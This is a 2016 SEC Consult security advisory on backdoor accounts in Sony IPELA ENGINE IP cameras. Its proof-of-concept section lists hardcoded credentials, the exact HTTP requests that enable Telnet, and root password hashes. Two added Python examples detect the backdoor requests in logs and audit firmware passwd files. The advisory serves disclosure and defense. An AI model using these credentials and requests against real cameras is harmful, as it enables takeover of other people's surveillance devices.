Sony IPELA ENGINE IP Cameras Backdoor Accounts

Posted Dec 6, 2016
Authored by Stefan Viehboeck | Site sec-consult.com

Sony IPELA ENGINE IP Cameras contain multiple backdoors that, among other functionality, allow an attacker to enable the Telnet/SSH service for remote administration over the network. Other available functionality may have undesired effects on the camera image quality or other camera functionality. After enabling Telnet/SSH, another backdoor allows an attacker to gain access to a Linux shell with root privileges.

tags | exploit, remote, shell, root
systems | linux
SHA-256 | 22e3af92e387283941072a466bbafa59aa472e2642354166a328c50464384720

We have published an accompanying blog post to this technical advisory with
further information:
http://blog.sec-consult.com/2016/12/backdoor-in-sony-ipela-engine-ip-cameras.html


SEC Consult Vulnerability Lab Security Advisory < 20161206-0 >
=======================================================================
title:              Backdoor vulnerability
product:            Sony IPELA ENGINE IP Cameras
                    (multiple products, see Vulnerable / tested versions below)
vulnerable version: see Vulnerable / tested versions below
fixed version:      see Vulnerable / tested versions below
CVE number:         -
impact:             Critical
homepage:           https://pro.sony.com/bbsc/ssr/mkt-security/
found:              2016-10-08
by:                 Stefan Viehböck (Office Vienna)
                    SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Sony Professional Solutions (SPS) is a subsidiary of Japanese multinational
technology and media conglomerate Sony with main focus on professional
products. These range from broadcast software and video cameras to providing
Outside Broadcast Units and professional displays."

Source: https://en.wikipedia.org/wiki/Sony_Professional_Solutions


Business recommendation:
------------------------
Attackers are able to completely take over the Sony IPELA ENGINE IP Camera
products over the network.

Sony has provided updated firmware which should be installed immediately.

SEC Consult recommends that Sony and Sony customers conduct a thorough
security review of the affected products.

It is essential to restrict access to IP cameras using VLANs, firewalls
etc. Otherwise the risk of being a botnet victim (e.g. Mirai) is high.


Vulnerability overview/description:
-----------------------------------
Sony IPELA ENGINE IP Cameras contain multiple backdoors that, among other
functionality, allow an attacker to enable the Telnet/SSH service for
remote administration over the network.

Other available functionality may have undesired effects on the camera
image quality or other camera functionality.

After enabling Telnet/SSH, another backdoor allows an attacker to gain
access to a Linux shell with root privileges!

The vulnerabilities are exploitable in the default configuration over the
network. Exploitation over the Internet is possible if the web interface
of the device is exposed.


Proof of concept:
-----------------
The following application-level backdoor accounts exist:
- User debug, Password: popeyeConnection
- User primana, Password: primana

These accounts are allowed to access specific, undocumented CGI functionality!

Enabling Telnet:
Execute the following HTTP requests. Afterwards the Telnet service is running
(TCP port 23). The following command is for Gen5 products, verified on SNC-DH160:

http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=zKw2hEr9
http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=cPoq2fi4cFk

Note: This request may look a bit different for Gen6 cameras; the string
"himitunokagi" (Japanese, translated: "secret key") is involved in the HTTP
request processing. On Gen6 cameras, an SSH daemon exists and can be enabled as
well.
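
Detection sketch for the requests described above. This is an added example, not part of the SEC Consult advisory: it assumes a reverse proxy or network sensor in front of the cameras that writes common-log-format lines including the HTTP Basic auth user; the sample lines, addresses and the PLACEHOLDER parameter value are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the advisory text above.
BACKDOOR_USERS = {"debug", "primana"}
FACTORY_CGI = "/command/prima-factory.cgi"

# Common log format: src ident authuser [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def findings(line):
    """Return the reasons a log line matches the advisory, or [] if none."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    reasons = []
    if m["user"].lower() in BACKDOOR_USERS:
        reasons.append("backdoor-account:" + m["user"])
    if url.path.lower() == FACTORY_CGI:
        reasons.append("factory-cgi")
        if any(k.lower() == "telnet" for k in parse_qs(url.query, keep_blank_values=True)):
            reasons.append("telnet-parameter")
        if m["status"].startswith("2"):
            reasons.append("request-accepted")
    return reasons

def scan(lines):
    """Return [(source, timestamp, reasons)] for every matching line."""
    hits = []
    for line in lines:
        reasons = findings(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m["src"], m["ts"], reasons))
    return hits

# Constructed sample lines: documentation addresses, placeholder parameter value.
SAMPLE = [
    '198.51.100.7 - primana [06/Dec/2016:10:01:02 +0000] '
    '"GET /command/prima-factory.cgi?foo=bar&Telnet=PLACEHOLDER HTTP/1.1" 200 12',
    '192.0.2.10 - admin [06/Dec/2016:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 310',
    '198.51.100.7 - debug [06/Dec/2016:10:03:00 +0000] "GET /index.html HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit carrying "request-accepted" should be followed by a check for new inbound connections to TCP port 23 or the SSH port on the same camera.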

Furthermore, an OS-level backdoor exists. This backdoor allows an attacker to
log in via Telnet/SSH and access the Linux shell with root privileges!

Below are the password hashes for the OS-level backdoor user:

root:$1$$mhF8LHkOmSgbD88/WrM790:0:0:5thgen:/root:/bin/sh (Gen5 cameras)
root:iMaxAEXStYyd6:0:0:root:/root:/bin/sh (Gen6 cameras)

Note: The backdoor accounts likely allow an attacker with physical access to
the hardware to log in via the serial port as well.
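
The kind of check a firmware review can run over an extracted /etc/passwd to flag entries like the two above. This is an added example, not SEC Consult's tooling or part of the advisory: the function names and the list of schemes treated as weak are assumptions of this sketch, the two root entries are the ones quoted in the advisory, and the daemon line is constructed.

```python
import re

DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")  # DES crypt: 2 salt + 11 hash chars
MODULAR = {"1": "md5-crypt", "5": "sha256-crypt", "6": "sha512-crypt"}
WEAK = {"empty", "des-crypt", "md5-crypt"}   # this example's policy, an assumption
NO_LOGIN_SHELLS = ("/nologin", "/false")

def scheme(pw):
    """Classify the password field (second column) of a passwd entry."""
    if pw == "":
        return "empty"
    if pw == "x":
        return "shadowed"
    if pw[0] in "*!":
        return "locked"
    if pw.startswith("$"):
        return MODULAR.get(pw.split("$")[1], "unknown")
    return "des-crypt" if DES_RE.match(pw) else "unknown"

def audit(passwd_text):
    """Return {account: [issues]} for entries that permit a password login."""
    report = {}
    for line in passwd_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, _gid, _gecos, _home, shell = fields
        kind = scheme(pw)
        if kind in ("shadowed", "locked") or shell.endswith(NO_LOGIN_SHELLS):
            continue
        issues = ["password-field:" + kind]
        if kind in WEAK:
            issues.append("weak-scheme")
        parts = pw.split("$")
        if len(parts) > 3 and parts[2] == "":
            issues.append("empty-salt")
        if uid == "0":
            issues.append("uid-0-shell")
        report[name] = issues
    return report

# Root entries as quoted in the advisory; the daemon line is constructed.
GEN5_PASSWD = "root:$1$$mhF8LHkOmSgbD88/WrM790:0:0:5thgen:/root:/bin/sh\n" \
              "daemon:x:1:1:daemon:/usr/sbin:/bin/false\n"
GEN6_PASSWD = "root:iMaxAEXStYyd6:0:0:root:/root:/bin/sh\n"

if __name__ == "__main__":
    print(audit(GEN5_PASSWD))
    print(audit(GEN6_PASSWD))
```

Entries marked "shadowed" are skipped here; run the same classification over the firmware's shadow file if one exists.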


Vulnerable / tested versions:
-----------------------------
This vulnerability was verified on an SNC-DH160 camera with firmware
version V1.82.01 (snc-ch-dh-e-series-eb-em-zb-zm-1-82-01.zip).

The same vulnerabilities were found in firmware for Gen6 cameras
V2.7.0 (snc-g6-series-v2-7-0.zip) during automated firmware analysis with
SEC Technologies IoT Inspector.

According to Sony, at least the following products are affected:

SNC-CH115, SNC-CH120, SNC-CH160, SNC-CH220, SNC-CH260, SNC-DH120,
SNC-DH120T, SNC-DH160, SNC-DH220, SNC-DH220T, SNC-DH260, SNC-EB520,
SNC-EM520, SNC-EM521, SNC-ZB550, SNC-ZM550, SNC-ZM551

SNC-EP550, SNC-EP580, SNC-ER550, SNC-ER550C, SNC-ER580, SNC-ER585,
SNC-ER585H, SNC-ZP550, SNC-ZR550

SNC-EP520, SNC-EP521, SNC-ER520, SNC-ER521, SNC-ER521C

SNC-CX600, SNC-CX600W, SNC-EB600, SNC-EB600B, SNC-EB602R, SNC-EB630,
SNC-EB630B, SNC-EB632R, SNC-EM600, SNC-EM601, SNC-EM602R, SNC-EM602RC,
SNC-EM630, SNC-EM631, SNC-EM632R, SNC-EM632RC, SNC-VB600, SNC-VB600B,
SNC-VB600B5, SNC-VB630, SNC-VB6305, SNC-VB6307, SNC-VB632D, SNC-VB635,
SNC-VM600, SNC-VM600B, SNC-VM600B5, SNC-VM601, SNC-VM601B, SNC-VM602R,
SNC-VM630, SNC-VM6305, SNC-VM6307, SNC-VM631, SNC-VM632R, SNC-WR600,
SNC-WR602, SNC-WR602C, SNC-WR630, SNC-WR632, SNC-WR632C, SNC-XM631,
SNC-XM632, SNC-XM636, SNC-XM637, SNC-VB600L, SNC-VM600L, SNC-XM631L,
SNC-WR602CL


Vendor contact timeline:
------------------------
2016-10-11: Contacting vendor through Sony Prime Support,
            asking for product security contact.
2016-10-11: Response from Product Manager - Video Security.
2016-10-14: Vendor sets up secure document exchange.
2016-10-14: Uploading security advisory.
2016-10-14: Vendor confirms receipt of security advisory.
2016-10-24: Asking for update.
2016-11-08: Asking for update again.
2016-11-08: Vendor: advisory information has been sent to HQ Japan,
            they are already working on it.
2016-11-28: Sony releases updated firmware and informs SEC Consult.
2016-11-30: Asking Sony additional questions regarding the vulnerability
            (no answer).
2016-11-30: Informing CERT-Bund and CERT.at.
2016-12-01: CERT-Bund informs FIRST (Forum of Incident Response and
            Security Teams).
2016-12-06: Public release of security advisory.


Solution:
---------
The vendor provided the following URL to download firmware updates for the
affected devices. Updates should be installed immediately:

https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras

The Sony "SNC Tool Box" can be used to confirm the current firmware version and
update the device:
https://pro.sony.com/bbsc/ssr/mkt-security/resource.downloads.bbsccms-assets-cat-camsec-downloads-SecurityDownloadsIPCameraTools.shtml


Workaround:
-----------
None available.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendations about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Stefan Viehböck / @2016
